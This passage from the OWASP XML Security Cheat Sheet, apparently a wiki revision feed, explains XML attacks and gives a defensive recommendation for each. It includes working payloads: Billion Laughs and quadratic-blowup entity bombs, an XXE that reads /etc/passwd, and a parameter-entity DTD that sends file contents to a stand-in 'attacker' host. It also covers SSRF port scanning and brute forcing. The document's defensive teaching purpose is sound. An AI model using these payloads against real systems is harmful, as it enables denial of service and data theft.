&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE TAG [&lt;br /&gt;
     &amp;lt;!ENTITY FILE  SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TAG&amp;gt;&amp;amp;FILE;&amp;lt;/TAG&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Check the document size prior to parsing its contents, and use an XML schema to validate the document structure. &lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available on the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server processes external entities, the attacker could use the schema to, for example, read files from the server remotely. This type of schema only serves as a suggestion for the structure of a document; to be used safely, it must include a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
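&lt;br /&gt;
A check for this condition can be automated. The following Python sketch assumes a POSIX filesystem; the function name &amp;lt;tt&amp;gt;is_world_writable&amp;lt;/tt&amp;gt; is hypothetical. It reads the same permission string that the listing above displays and inspects the write bit for other users:&lt;br /&gt;

```python
import os
import stat


def is_world_writable(path):
    """Return True if any user on the system may modify the file at path."""
    # stat.filemode() renders the mode the way ls -l does, e.g. '-rw-rw-rw-';
    # index 8 of that string is the write bit for "other" users.
    mode_string = stat.filemode(os.stat(path).st_mode)
    return mode_string[8] == 'w'
```

Running such a check against every local schema before it is loaded would flag a file like the one listed above.&lt;br /&gt;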
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an Internet Protocol (IP) address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own IP addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid the schema poisoning attack, you must use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
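&lt;br /&gt;
The integrity check can be sketched in Python as follows. This is an illustration under stated assumptions: the function names are hypothetical, and the pinned SHA-256 digest is assumed to have been recorded from a known good copy of the schema and stored separately from it:&lt;br /&gt;

```python
import hashlib
import hmac


def sha256_of_file(path):
    """Return the hex SHA-256 digest of the file at path."""
    digest = hashlib.sha256()
    with open(path, 'rb') as handle:
        # Hash in chunks so large schema files are not loaded at once.
        for chunk in iter(lambda: handle.read(65536), b''):
            digest.update(chunk)
    return digest.hexdigest()


def schema_is_trusted(path, pinned_digest):
    """Compare the local schema copy against a digest recorded in advance."""
    # compare_digest performs the comparison in constant time.
    return hmac.compare_digest(sha256_of_file(path), pinned_digest.lower())
```

An application would refuse to validate against the schema whenever &amp;lt;tt&amp;gt;schema_is_trusted&amp;lt;/tt&amp;gt; returns false.&lt;br /&gt;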
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as a reference to entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
&amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
&amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt; ]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
  &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
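&lt;br /&gt;
The amplification achieved by this attack can be estimated with simple arithmetic. The Python sketch below ignores the few bytes of surrounding markup, and its variable names are illustrative only:&lt;br /&gt;

```python
ENTITY_LENGTH = 100_000    # characters in the single entity A
REFERENCE_COUNT = 100_000  # number of times the body references it
REFERENCE_LENGTH = 3       # an ampersand, the name A, and a semicolon

# Approximate size of the document the attacker has to send.
document_size = ENTITY_LENGTH + REFERENCE_COUNT * REFERENCE_LENGTH

# Size of the text after every reference has been expanded.
expanded_size = ENTITY_LENGTH * REFERENCE_COUNT

amplification = expanded_size // document_size
print(document_size, expanded_size, amplification)
```

A document of roughly 400,000 characters therefore expands to 10,000,000,000 characters, an amplification factor of about 25,000.&lt;br /&gt;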
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, the application will start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of these will then be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. In the end, the CPU and/or memory will be affected by expanding 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, 3*10^9 (3,000,000,000) characters in total, which could make the parser crash.&lt;br /&gt;
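&lt;br /&gt;
The exponential growth can be verified with a short calculation. In this Python sketch the function name &amp;lt;tt&amp;gt;expanded_length&amp;lt;/tt&amp;gt; is hypothetical; it models a chain in which every entity references the previous one a fixed number of times:&lt;br /&gt;

```python
def expanded_length(base_text, fanout, levels):
    """Length of the text produced by fully expanding the outermost entity."""
    # Each level references the previous one `fanout` times, so the number
    # of copies of the base text is multiplied by `fanout` at every level.
    copies = fanout ** levels
    return copies * len(base_text)


total = expanded_length('LOL', fanout=10, levels=9)
print(total)
```

With nine levels of ten references each, the three-character string grows to 3,000,000,000 characters, although the document itself is under one kilobyte.&lt;br /&gt;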
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:Envelope ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt;&lt;br /&gt;
    &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
RFC 2376 states that &amp;quot;Recursive expansions are prohibited [REC-XML] and XML processors are required to detect them&amp;quot;. To detect this type of behavior automatically, you must limit the number of expansions to be made, or disable the use of inline DTD schemas altogether in your XML parsing objects. SOAP messages should be inherently safe from this vulnerability because “a SOAP message MUST NOT contain a document type declaration,” but when this type of vulnerability was detected, certain implementations did not comply with this rule.&lt;br /&gt;
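&lt;br /&gt;
One possible way to disable inline DTDs is sketched below in Python, using the expat bindings from the standard library. The names &amp;lt;tt&amp;gt;DtdForbidden&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;parse_without_dtd&amp;lt;/tt&amp;gt; are hypothetical; other parsers expose different switches for the same purpose. The handler runs when the parser reaches the document type declaration, so raising from it stops parsing before any entity is declared or expanded:&lt;br /&gt;

```python
import xml.parsers.expat


class DtdForbidden(ValueError):
    """Raised when a document carries a document type declaration."""


def parse_without_dtd(document):
    """Parse document with expat, rejecting it if it contains a DOCTYPE."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Abort immediately; no entity from the DTD is ever processed.
        raise DtdForbidden('document type declaration is not allowed: ' + name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(document, True)
```

Documents without a DTD are parsed normally, while any of the entity expansion payloads above would be rejected at the first line of the declaration.&lt;br /&gt;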
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;xxe;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose value is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the entity is expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid a file retrieval attack, avoid using DTD and validate the content of XML documents according to the expected values of a local XML schema.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file served over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE roottag [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;send;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what is going on because you receive the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to a valid port will be very quick (one second, for example). The differences between open and closed ports become quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, do not use DTD.&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224416</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224416"/>
